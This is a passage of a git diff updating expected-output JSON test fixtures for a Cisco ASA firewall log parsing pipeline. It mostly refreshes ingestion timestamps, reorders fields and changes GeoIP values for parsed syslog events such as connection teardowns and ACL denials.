"2021-12-09T13:31:25.163355500Z", + "ingested": "2021-12-14T14:36:13.057661421Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!", "code": "713904", "kind": "event", @@ -5753,7 +5669,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163360800Z", + "ingested": "2021-12-14T14:36:13.057661767Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713903", "kind": "event", @@ -5797,7 +5713,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:31:25.163365600Z", + "ingested": "2021-12-14T14:36:13.057662122Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!", "code": "713902", "kind": "event", @@ -5819,16 +5735,6 @@ ] }, { - "log": { - "level": "informational" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -5847,13 +5753,20 @@ "192.168.1.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:31:25.163370900Z", + "ingested": "2021-12-14T14:36:13.057662478Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713901", "kind": "event", @@ -5869,7 +5782,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json index 48c6d1a9356..941db57a52e 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:35.036770200Z", + "ingested": "2021-12-14T14:36:22.161214817Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:35.036793100Z", + "ingested": "2021-12-14T14:36:22.161217172Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:35.036798400Z", + "ingested": "2021-12-14T14:36:22.161217584Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:35.036803900Z", + "ingested": "2021-12-14T14:36:22.161220778Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:35.036832700Z", + "ingested": "2021-12-14T14:36:22.161221227Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", @@ -401,7 +401,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:35.036838Z", + "ingested": "2021-12-14T14:36:22.161221587Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-3-313008: Denied IPv6-ICMP type=134, code=0 from fe80::1ff:fe23:4567:890a on interface ISP1", "code": "313008", "kind": "event", @@ -471,7 +471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:35.036843Z", + "ingested": "2021-12-14T14:36:22.161221960Z", "original": "Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.255.0.206/8795 (10.255.0.206/8795) to identity:10.12.31.51/0 (10.12.31.51/0), ICMP id 295, ICMP type 8", "code": "313009", "kind": "event", @@ -545,7 +545,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:35.036865900Z", + "ingested": "2021-12-14T14:36:22.161222339Z", "original": "Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -615,7 +615,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:35.036871100Z", + "ingested": "2021-12-14T14:36:22.161222691Z", "original": "Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\\\username) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -688,7 +688,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:35.036875Z", + "ingested": "2021-12-14T14:36:22.161223047Z", "original": "Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -\u003e inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106102", "kind": "event", @@ -721,20 +721,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -783,7 +777,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:31:35.036879900Z", + "ingested": "2021-12-14T14:36:22.161223419Z", "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106103", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json index d89b51ee8f0..69bb9b5d45e 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json @@ -59,7 +59,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363216200Z", + "ingested": "2021-12-14T14:36:23.392237546Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", @@ -138,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363224400Z", + "ingested": "2021-12-14T14:36:23.392242512Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", @@ -224,7 +224,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363228700Z", + "ingested": "2021-12-14T14:36:23.392243229Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", @@ -309,7 +309,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363232700Z", + "ingested": "2021-12-14T14:36:23.392243621Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", @@ -394,7 +394,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363237300Z", + "ingested": "2021-12-14T14:36:23.392244026Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", @@ -479,7 +479,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363241900Z", + "ingested": "2021-12-14T14:36:23.392244408Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", @@ -564,7 +564,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363246800Z", + "ingested": "2021-12-14T14:36:23.392244805Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", @@ -649,7 +649,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363252300Z", + "ingested": "2021-12-14T14:36:23.392245262Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", @@ -734,7 +734,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363256500Z", + "ingested": "2021-12-14T14:36:23.392245669Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", @@ -819,7 +819,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363260700Z", + "ingested": "2021-12-14T14:36:23.392246064Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", @@ -904,7 +904,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363265400Z", + "ingested": "2021-12-14T14:36:23.392246470Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", @@ -989,7 +989,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363269900Z", + "ingested": "2021-12-14T14:36:23.392247074Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", @@ -1074,7 +1074,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363274400Z", + "ingested": "2021-12-14T14:36:23.392247468Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", @@ -1159,7 +1159,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363279300Z", + "ingested": "2021-12-14T14:36:23.392248018Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", @@ -1244,7 +1244,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363283900Z", + "ingested": "2021-12-14T14:36:23.392248420Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", @@ -1329,7 +1329,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363288600Z", + "ingested": "2021-12-14T14:36:23.392248807Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", @@ -1414,7 +1414,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363293800Z", + "ingested": "2021-12-14T14:36:23.392249323Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", @@ -1499,7 +1499,7 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363299700Z", + "ingested": "2021-12-14T14:36:23.392249716Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", @@ -1584,7 +1584,7 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-12-09T13:31:36.363337100Z", + "ingested": "2021-12-14T14:36:23.392250189Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", @@ -1666,7 +1666,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363344400Z", + "ingested": "2021-12-14T14:36:23.392250602Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", @@ -1745,7 +1745,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363350400Z", + "ingested": "2021-12-14T14:36:23.392251094Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1830,7 +1830,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363356400Z", + "ingested": "2021-12-14T14:36:23.392251480Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", @@ -1913,7 +1913,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363361Z", + "ingested": "2021-12-14T14:36:23.392251904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1998,7 +1998,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363365200Z", + "ingested": "2021-12-14T14:36:23.392252406Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", @@ -2080,7 +2080,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363369600Z", + "ingested": "2021-12-14T14:36:23.392252794Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", @@ -2159,7 +2159,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363373300Z", + "ingested": "2021-12-14T14:36:23.392253186Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", @@ -2242,7 +2242,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363377600Z", + "ingested": "2021-12-14T14:36:23.392253672Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", @@ -2321,7 +2321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363381600Z", + "ingested": "2021-12-14T14:36:23.392254085Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", @@ -2405,7 +2405,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363385800Z", + "ingested": "2021-12-14T14:36:23.392254568Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2489,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363389800Z", + "ingested": "2021-12-14T14:36:23.392254955Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2574,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363394100Z", + "ingested": "2021-12-14T14:36:23.392255340Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2658,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363398400Z", + "ingested": "2021-12-14T14:36:23.392255785Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", @@ -2740,7 +2740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363403Z", + "ingested": "2021-12-14T14:36:23.392256223Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", @@ -2819,7 +2819,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363406900Z", + "ingested": "2021-12-14T14:36:23.392256604Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2902,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363410500Z", + "ingested": "2021-12-14T14:36:23.392257106Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2981,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363414600Z", + "ingested": "2021-12-14T14:36:23.392257504Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3065,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363419500Z", + "ingested": "2021-12-14T14:36:23.392257899Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3150,7 +3150,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363424600Z", + "ingested": "2021-12-14T14:36:23.392258410Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", @@ -3234,7 +3234,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363429100Z", + "ingested": "2021-12-14T14:36:23.392258869Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3316,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363433500Z", + "ingested": "2021-12-14T14:36:23.392259266Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3395,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363438Z", + "ingested": "2021-12-14T14:36:23.392259657Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3479,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363442900Z", + "ingested": "2021-12-14T14:36:23.392260044Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3563,7 +3563,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363447Z", + "ingested": "2021-12-14T14:36:23.392260435Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3648,7 +3648,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363452100Z", + "ingested": "2021-12-14T14:36:23.392262447Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3732,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363457900Z", + "ingested": "2021-12-14T14:36:23.392262943Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3814,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363462700Z", + "ingested": "2021-12-14T14:36:23.392263331Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3893,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363466400Z", + "ingested": "2021-12-14T14:36:23.392263722Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", @@ -3979,7 +3979,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363470900Z", + "ingested": "2021-12-14T14:36:23.392264102Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", @@ -4062,7 +4062,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363476700Z", + "ingested": "2021-12-14T14:36:23.392264580Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4147,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363481500Z", + "ingested": "2021-12-14T14:36:23.392265013Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4231,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363486Z", + "ingested": "2021-12-14T14:36:23.392265531Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363490600Z", + "ingested": "2021-12-14T14:36:23.392265915Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", @@ -4392,7 +4392,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363496500Z", + "ingested": "2021-12-14T14:36:23.392266300Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", @@ -4475,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363502300Z", + "ingested": "2021-12-14T14:36:23.392266749Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", @@ -4554,7 +4554,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363524200Z", + "ingested": "2021-12-14T14:36:23.392267189Z", "original": "Oct 10 2018 12:34:56 localhost 